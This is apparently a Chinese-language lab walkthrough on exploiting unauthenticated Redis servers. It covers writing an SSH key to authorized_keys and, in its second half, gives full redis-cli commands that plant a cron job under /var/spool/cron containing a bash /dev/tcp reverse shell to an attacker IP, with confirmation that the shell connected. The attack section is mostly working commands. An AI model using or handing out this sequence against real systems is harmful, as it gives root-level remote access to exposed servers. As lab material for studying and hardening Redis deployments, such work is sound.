Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务登录目标服务器、添加计划任务、写入Webshell等操作。
基础环境:ContOS 7 IP地址:192.168.12.132 下载redis:·wget http://download.redis.io/releases/redis-2.8.17.tar.gz 解压&安装 tar xzvf redis-2.8.17.tar.gz #解压安装包 cd redis-2.8.17 # 进入redis目录 make #编译 安装&启动 [root@localhost redis-2.8.17]# cd src/ #进入src目录 [root@localhost src]# cp redis-server /usr/bin [root@localhost src]# cp redis-cli /usr/bin/ #将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了) cd .. # 返回上一级目录 [root@localhost redis-2.8.17]# cp redis.conf /etc/ #将redis.conf拷贝到/etc/目录下 [root@localhost redis-2.8.17]# redis-server /etc/redis.conf # 使用/etc/目录下的redis.conf文件中的配置启动redis服务通过Nmap扫描:
利用crontab反弹shell。在攻击机上监听一个端口(未被占用的任意端口):
在Windows攻击机里下载redis-cli.exe,利用crontab反弹shell测试使用。
连接redis,写入反弹shell:
redis 192.168.12.132:6379> config set dir /var/spool/cron redis 192.168.12.132:6379> set -.- "\n\n\n* * * * * bash -i >& /dev/tcp/192.168.12.131/4444 0>&1\n\n\n" redis 192.168.12.132:6379> config set dbfilename root redis 192.168.12.132:6379> save反弹命令已经写入目标主机:
此时,目标系统192.168.12.132的shell已经反弹到攻击机192.168.12.131:
